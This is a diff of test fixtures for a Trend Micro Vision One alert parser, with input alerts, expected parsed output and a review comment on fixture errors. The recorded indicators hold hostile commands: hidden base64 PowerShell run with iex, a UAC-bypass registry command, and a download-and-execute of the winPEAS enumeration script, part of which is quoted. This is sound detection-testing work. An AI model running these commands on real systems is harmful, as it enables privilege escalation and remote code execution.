\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": 
\"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": 
\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": 
\"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], 
\"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": 
\"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP 
-NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x",
+ "type": "REG_SZ"
+ },
+ "hive": "hkcr",
+ "key": "ms-settings\\shell\\open\\command",
+ "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute",
+ "value": "delegateexecute"
+ },
+ "related": {
+ "ip": [
+ "10.10.58.51"
+ ],
+ "user": [
+ "sam"
+ ]
+ },
+ "rule": {
+ "name": "Privilege Escalation via UAC Bypass"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-9002-20220906-00022",
+ "case_id": "CL-1-20230706-00001",
+ "incident_id": "IC-1-20230706-00001",
+ "investigation_status": "New",
+ "severity": "high",
+ "status": "Open"
+ }
+ },
+ "user": {
+ "domain": "shockwave",
+ "email": "support@pctutordetroit.com",
+ "id": "shockwave\\sam",
+ "name": "sam"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json
new file mode 100644
index 000000000..a9a7d3d7c
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json
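Review bot: The expected `registry.path` in this fixture repeats the key — `hkcr\ms-settings\shell\open\command\hkcr\ms-settings\shell\open\command\delegateexecute` — which looks like the parser joining both `registry_key` indicators (ids 5 and 6 carry the same value, one per matched filter) instead of deduplicating them, so the test pins a malformed path rather than the ECS hive\key\value form. The expected line should read `"path": "hkcr\\ms-settings\\shell\\open\\command\\delegateexecute"`, with the parser deduplicating indicator values by type before concatenation (the duplicate `command_line` indicators 1/3 and 2/4 already collapse to a single value in `process`, so the same rule should apply to `registry_key`). `registry.data.type` is asserted as `"REG_SZ"` although nothing in the input payload states a value type, so if that is a hard-coded default in the parser it deserves a comment there rather than being pinned as if it came from the alert. Likewise `user.email` is populated from the `emailAddress` entity whose `relatedEntities` is empty, so the payload does not tie `support@pctutordetroit.com` to `shockwave\sam`; confirm that association is intended before analysts treat it as an attribute of the account.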
@@ -0,0 +1,75 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", 
\"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | 
Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n 
if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": 
\"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", 
\"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": 